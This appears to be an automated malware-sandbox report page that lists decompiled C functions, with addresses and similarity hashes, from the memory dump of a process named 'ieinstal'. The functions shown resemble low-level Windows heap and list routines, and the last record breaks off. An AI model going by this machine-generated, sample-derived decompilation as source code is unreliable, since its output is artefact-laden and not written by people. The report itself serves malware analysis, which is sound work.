                        0x1ed877f0
                        0x1ed877f3
                        0x1ed877f6
                        0x1ed877fd
                        0x1ed87800
                        0x1ed8780c
                        0x1ed87818
                        0x1ed8782b
                        0x1ed8781a
                        0x1ed87823
                        0x1ed87823
                        0x1ed87830
                        0x1ed87831
                        0x1ed87838
                        0x1ed8783d
                        0x1ed8783e
                        0x1ed8784f
                        0x1ed8784f
                        0x1ed8785a

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29fc5e78a8fde15e97c5e0adb716301ed99bc2b381b74231c5c215f274a5f011
                        • Instruction ID: d4fd59e10dcb46bd18d50622579683f802400f5b11e1c240afbb26e039c90b50
                        • Opcode Fuzzy Hash: 29fc5e78a8fde15e97c5e0adb716301ed99bc2b381b74231c5c215f274a5f011
                        • Instruction Fuzzy Hash: 76219D76900644ABC725CF69DC90E9BB7B9EF48740F110669E90ACBB90D734E910CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3FD9B, Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E1ED3FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E1ED176E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                        0x1ed3fd9b
                        0x1ed3fda0
                        0x1ed3fda1
                        0x1ed3fdab
                        0x1ed3fdad
                        0x1ed3fdb0
                        0x1ed3fdb8
                        0x1ed3fe0f
                        0x1ed3fde6
                        0x1ed3fde9
                        0x1ed3fdec
                        0x1ed7c0c0
                        0x1ed3fdfe
                        0x1ed3fe06
                        0x1ed3fe06
                        0x1ed7c0c8
                        0x1ed3fe2d
                        0x1ed3fe2d
                        0x00000000
                        0x1ed3fe2d
                        0x1ed7c0d1
                        0x1ed7c0e0
                        0x1ed7c0e5
                        0x1ed7c0e5
                        0x1ed7c0e8
                        0x00000000
                        0x1ed7c0e8
                        0x1ed3fdf4
                        0x00000000
                        0x00000000
                        0x1ed3fdf6
                        0x1ed3fdfa
                        0x1ed3fe1a
                        0x1ed3fe1f
                        0x1ed3fe1f
                        0x1ed3fdfc
                        0x00000000
                        0x1ed3fdfc
                        0x1ed3fdcc
                        0x1ed3fdd0
                        0x1ed3fe26
                        0x00000000
                        0x1ed3fe26
                        0x1ed3fdd8
                        0x1ed3fddb
                        0x1ed3fddd
                        0x1ed3fde0
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: 6aaf4e9042f635dfe9a7514426f6650877c152cee5bac21baafe5cb2707b576b
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: 1421B0B2600689DFC324CF4AD544E96B7E6EB94A12F2186BEE88497714D734EC40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED09240, Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E1ED09240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x1eddf708);
				E1ED5D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E1ED495D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E1ED495D0();
				_t33 =  *0x1edf84c4; // 0x0
				L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x1edf84c4; // 0x0
				L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x1edf84c4; // 0x0
				E1ED22280(L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1edf86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E1ED495D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E1ED495D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E1ED09325();
					_t50 =  *0x1edf84c4; // 0x0
					return E1ED5D0D1(L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                        0x1ed09240
                        0x1ed09242
                        0x1ed09247
                        0x1ed0924c
                        0x1ed0924e
                        0x1ed09255
                        0x1ed09257
                        0x1ed0925a
                        0x1ed0925f
                        0x1ed0925f
                        0x1ed09266
                        0x1ed09271
                        0x1ed09276
                        0x1ed09279
                        0x1ed0927e
                        0x1ed09295
                        0x1ed0929a
                        0x1ed092b1
                        0x1ed092b6
                        0x1ed092d7
                        0x1ed092dc
                        0x1ed092e0
                        0x1ed092e6
                        0x1ed092e8
                        0x1ed092ee
                        0x1ed09332
                        0x1ed09333
                        0x1ed09337
                        0x1ed09338
                        0x1ed0933a
                        0x1ed0933a
                        0x1ed0933d
                        0x1ed09342
                        0x1ed09342
                        0x1ed09345
                        0x1ed09349
                        0x1ed0934e
                        0x1ed09352
                        0x1ed09357
                        0x1ed092f4
                        0x1ed092f4
                        0x1ed092f6
                        0x1ed092f9
                        0x1ed09300
                        0x1ed09306
                        0x1ed09324
                        0x1ed09324

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cce78e8e9cd4759d63454d054fad7311251e9b3c07eb14934b923742d98bdb34
                        • Instruction ID: e01486b2d8d8cc4ef03b83c1241ddfb3f66a630c7557050502ff2a3a9dbde440
                        • Opcode Fuzzy Hash: cce78e8e9cd4759d63454d054fad7311251e9b3c07eb14934b923742d98bdb34
                        • Instruction Fuzzy Hash: 09213C35051681DFC721DF28CA50F5AB7B9FF18708F594A68E04A876E1C734E942CB65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3B390, Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E1ED3B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E1ED22280(_t12, 0x1edf8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E1ED400C2(0x1edf8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                        0x1ed3b395
                        0x1ed3b3a2
                        0x1ed3b3a5
                        0x1ed3b3aa
                        0x1ed3b3b2
                        0x1ed3b3ba
                        0x1ed3b3bd
                        0x1ed3b3c0
                        0x1ed3b3c4
                        0x1ed3b3c9
                        0x1ed7a3e9
                        0x1ed7a3ed
                        0x1ed7a3f0
                        0x1ed7a3ff
                        0x1ed7a403
                        0x1ed7a409
                        0x00000000
                        0x00000000
                        0x1ed7a40b
                        0x1ed7a40b
                        0x1ed7a40f
                        0x1ed7a415
                        0x1ed7a423
                        0x1ed7a423
                        0x1ed7a415
                        0x1ed3b3d1
                        0x1ed3b3e8
                        0x1ed3b3e8
                        0x1ed3b3d9

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 880c79ac26016b020c8cd991d5e3c7e7a9f7df0d0324c5f0f2bcfc76cbca96d9
                        • Instruction ID: 08042ea3ffb31436ce9244c917b7efc2aed1328c7c6adbe614dd37d6ef89e67c
                        • Opcode Fuzzy Hash: 880c79ac26016b020c8cd991d5e3c7e7a9f7df0d0324c5f0f2bcfc76cbca96d9
                        • Instruction Fuzzy Hash: 6B1148777151609BC719CA569D81A5BB257EBC5730B79033DED1687380CA32EC02C792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED94257, Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E1ED94257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x1ede08d0);
				E1ED5D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E1ED941E8(__ebx, __edi, __ecx, _t39);
				E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x1edf87e4;
					_t18 =  *0x1edf87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1edf5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x1edf87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x1edf87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L1ED07055(_t31 + 0xfffffff8);
								_t24 =  *0x1edf87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x1edf87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1edf5cd0;
				if( *0x1edf5cd0 <= 0) {
					L1ED07055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x1edf87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x1edf87e8 = _t30;
						 *0x1edf87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E1ED5D0D1(L1ED94320());
			}















                        0x1ed94257
                        0x1ed94257
                        0x1ed94257
                        0x1ed94259
                        0x1ed9425e
                        0x1ed94263
                        0x1ed94265
                        0x1ed94273
                        0x1ed94278
                        0x1ed9427c
                        0x1ed9427f
                        0x1ed94281
                        0x1ed94287
                        0x1ed942d7
                        0x1ed942d7
                        0x1ed942da
                        0x1ed9428d
                        0x1ed9428d
                        0x1ed9428f
                        0x1ed94292
                        0x1ed94297
                        0x1ed9429c
                        0x1ed942a0
                        0x1ed942a6
                        0x1ed942a8
                        0x1ed942ae
                        0x1ed942b3
                        0x00000000
                        0x1ed942ba
                        0x1ed942ba
                        0x1ed942bf
                        0x1ed942c5
                        0x1ed942ca
                        0x1ed942cf
                        0x1ed942d0
                        0x00000000
                        0x1ed942d0
                        0x1ed942b3
                        0x00000000
                        0x1ed942a6
                        0x1ed9429c
                        0x1ed942dc
                        0x1ed942dc
                        0x1ed942e3
                        0x1ed94309
                        0x1ed942e5
                        0x1ed942e5
                        0x1ed942e8
                        0x1ed942ee
                        0x1ed942f0
                        0x00000000
                        0x1ed942f2
                        0x1ed942f2
                        0x1ed942f4
                        0x1ed942f7
                        0x1ed942f9
                        0x1ed94300
                        0x1ed94300
                        0x1ed942f0
                        0x1ed9430e
                        0x1ed9431f

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7aba5c3f59dd3e8d2a0cd4ec98b38a3517baf691e53ffa1be5d6f555d930f957
                        • Instruction ID: ddf213084ea8aeb3499fd57f689511d57e9506ef786cc919f36ff10dd5187cb6
                        • Opcode Fuzzy Hash: 7aba5c3f59dd3e8d2a0cd4ec98b38a3517baf691e53ffa1be5d6f555d930f957
                        • Instruction Fuzzy Hash: E2216D78901762CFC704DF65C9A1608BBF1FF45314B51876AC1168B296D731E443DB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED846A7, Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E1ED846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E1ED4F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E1ED3D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L1ED277F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                        0x1ed846b7
                        0x1ed846ba
                        0x1ed846c5
                        0x1ed846c8
                        0x1ed846d0
                        0x1ed846d4
                        0x1ed846e6
                        0x1ed846e9
                        0x1ed846f4
                        0x1ed846ff
                        0x1ed84705
                        0x1ed84706
                        0x1ed8470c
                        0x1ed84713
                        0x1ed8471b
                        0x1ed84723
                        0x1ed84725
                        0x1ed846d6
                        0x1ed846d9
                        0x1ed846db
                        0x1ed846db
                        0x1ed84732

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: 3104a720a51b658946c505bb70cf1f43e3058dfe9f8bdfbda9fcdb02ae64259f
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: E1110276504248BBC7018F5C98808BEB7B9EF95304F1081AEF98487350DB319D51C7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED32397, Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        C-Code - Quality: 34%
                        			E1ED32397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x1edf848c != 0) {
					L1ED2FAD0(0x1edf8610);
					if( *0x1edf848c == 0) {
						E1ED2FA00(0x1edf8610, _t19, _t27, 0x1edf8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E1ED32581(0x1edf8610, 0x1ece50a0, _t26, _t27, _t28);
						E1ED2FA00(0x1edf8610, 0x1ece50a0, _t27, 0x1edf8610);
					}
				} else {
					L1:
					_t11 =  *0x1edf8614; // 0x1
					if(_t11 == 0) {
						_t11 = E1ED44886(0x1ece1088, 1, 0x1edf8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E1ED32581(0x1edf8610, (_t11 << 4) + 0x1ece5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                        0x1ed323b0
                        0x1ed323b6
                        0x1ed32409
                        0x1ed32415
                        0x1ed75ae9
                        0x00000000
                        0x1ed3241b
                        0x1ed3241b
                        0x1ed3241d
                        0x1ed32427
                        0x1ed3242e
                        0x1ed32430
                        0x1ed32430
                        0x1ed323b8
                        0x1ed323b8
                        0x1ed323b8
                        0x1ed323bf
                        0x1ed323fc
                        0x1ed323fc
                        0x1ed323c1
                        0x1ed323c3
                        0x1ed323d0
                        0x1ed323d8
                        0x1ed323d8
                        0x1ed323dc
                        0x1ed323de
                        0x1ed323e1
                        0x1ed323e1
                        0x1ed323ec

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80d8c2a60257f50386fd35ca72d9f7230d5e036091a3dae030c52c25da071c18
                        • Instruction ID: 23c3a2bc1ad7ea58ae6fc66a6971b4324f5c92c1375f05fb245cc6fb99364eed
                        • Opcode Fuzzy Hash: 80d8c2a60257f50386fd35ca72d9f7230d5e036091a3dae030c52c25da071c18
                        • Instruction Fuzzy Hash: 8D114275F003906BD720C62A9C91B19F6C9AF50F12F644B2EF542A76C0D770F882C765
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED437F5, Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E1ED437F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E1ED22280(_t6, 0x1edf8550);
				}
				_t29 = E1ED4387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E1ED1FFB0(0x1edf8550, _t27, 0x1edf8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                        0x1ed437fa
                        0x1ed437fc
                        0x1ed43805
                        0x1ed43808
                        0x1ed43808
                        0x1ed43814
                        0x1ed43818
                        0x1ed43846
                        0x1ed43848
                        0x1ed4384b
                        0x1ed4384b
                        0x1ed43852
                        0x00000000
                        0x1ed43854
                        0x1ed43856
                        0x00000000
                        0x00000000
                        0x1ed43863
                        0x00000000
                        0x1ed43863
                        0x1ed4381a
                        0x1ed4381a
                        0x1ed4381f
                        0x1ed4386e
                        0x1ed4386e
                        0x1ed43871
                        0x1ed43873
                        0x1ed43873
                        0x1ed43868
                        0x00000000
                        0x1ed43868
                        0x1ed43821
                        0x1ed43826
                        0x00000000
                        0x00000000
                        0x1ed43828
                        0x1ed4382a
                        0x1ed43841
                        0x00000000
                        0x1ed43841

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f54100e1c12952f10d7fa794289554abd25bd978e3937b8fd7171d0033993922
                        • Instruction ID: 6655081defb0a62c1ac1db32585a0f5faca595bf3e7f87cc819b6f719c506a31
                        • Opcode Fuzzy Hash: f54100e1c12952f10d7fa794289554abd25bd978e3937b8fd7171d0033993922
                        • Instruction Fuzzy Hash: D70149729016919BC3278B1ED940E1EFBA7DFA5B60726466DE4498FB44DF30D801C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0C962, Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        C-Code - Quality: 42%
                        			E1ED0C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x1edfd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E1ED1EEF0(0x1edf70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E1ED8F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E1ED1EB70(_t29, 0x1edf70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E1ED4B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E1ED8F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x1edf70c0; // 0x0
					while(_t38 != 0x1edf70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x1edfb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                        0x1ed0c96a
                        0x1ed0c974
                        0x1ed0c988
                        0x1ed0c98a
                        0x1ed77c9d
                        0x1ed77c9f
                        0x1ed77ca4
                        0x1ed77cae
                        0x1ed77cf0
                        0x1ed77cf5
                        0x1ed77cfa
                        0x1ed0c992
                        0x1ed0c996
                        0x1ed0c997
                        0x1ed0c998
                        0x1ed0c9a3
                        0x1ed0c9a3
                        0x1ed77cb0
                        0x1ed77cb7
                        0x1ed77cbb
                        0x00000000
                        0x00000000
                        0x1ed77cbd
                        0x1ed77ce8
                        0x1ed77cc5
                        0x1ed77cc8
                        0x1ed77cca
                        0x1ed77cd0
                        0x1ed77cd6
                        0x1ed77cde
                        0x1ed77ce4
                        0x1ed77ce4
                        0x1ed77cd0
                        0x00000000
                        0x1ed77ce8
                        0x1ed0c990
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1b29db7470df3e87a53a0c033d99a6d6e154c5a333bb6cc6312570f0f2d376d
                        • Instruction ID: b47b816cfafdd00771c6687764a157dba386be8cca10d8dbe1c09b29cc14bced
                        • Opcode Fuzzy Hash: f1b29db7470df3e87a53a0c033d99a6d6e154c5a333bb6cc6312570f0f2d376d
